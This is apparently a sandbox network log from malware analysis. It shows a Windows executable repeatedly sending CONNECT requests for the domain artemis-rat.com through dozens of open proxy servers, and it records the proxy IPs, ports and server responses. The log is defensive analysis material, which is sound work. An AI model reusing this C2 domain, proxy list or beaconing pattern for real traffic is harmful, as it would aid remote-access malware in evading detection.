                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1442192.168.2.552396202.40.181.220312473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.401707888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1443192.168.2.55243751.79.87.144225003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.402970076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423821926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468288898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.509557009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1444192.168.2.552501162.241.46.40562413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.403696060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405220032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405416965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.499010086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1445192.168.2.553899162.144.36.208316833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.408813000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.905088902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.499144077 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.593265057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.889642954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.201982021 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.405291080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1446 | 192.168.2.5 | 53876 | 3.212.148.199 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.411370039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.630837917 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:44 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1447 | 192.168.2.5 | 53958 | 104.20.205.191 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.414470911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.569150925 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1448 | 192.168.2.5 | 53976 | 172.67.182.77 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.418654919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.574489117 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1449 | 192.168.2.5 | 52521 | 209.222.97.30 | 15805 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.419058084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.405220032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.405416965 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.499010086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1450 | 192.168.2.5 | 53973 | 104.25.244.70 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.419070959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.575516939 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1451192.168.2.55384147.106.112.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.422962904 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.768527985 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1452192.168.2.553992104.22.1.113803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.423660040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.579629898 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1453192.168.2.553995104.27.8.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.425493002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.581568956 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1454192.168.2.55384936.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.438836098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.201951027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202653885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202137947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.202111006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.202127934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.202330112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1455192.168.2.553847111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.441787004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1456192.168.2.55246743.255.113.232843876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.449866056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.201950073 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.999383926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.592911959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701945066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905141115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092612982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.201911926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1457192.168.2.55392838.162.20.13831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.544246912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.974198103 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1458192.168.2.553871114.156.77.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.544702053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.834003925 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Content-Length: 4872
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1459192.168.2.549816104.238.111.107562253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.545291901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1460192.168.2.55394851.222.241.8629163876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.545353889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1461192.168.2.55385860.12.168.11490023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547246933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.934250116 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 03:09:26 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1462192.168.2.553846103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547652960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1463192.168.2.553544162.214.121.173629763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547802925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
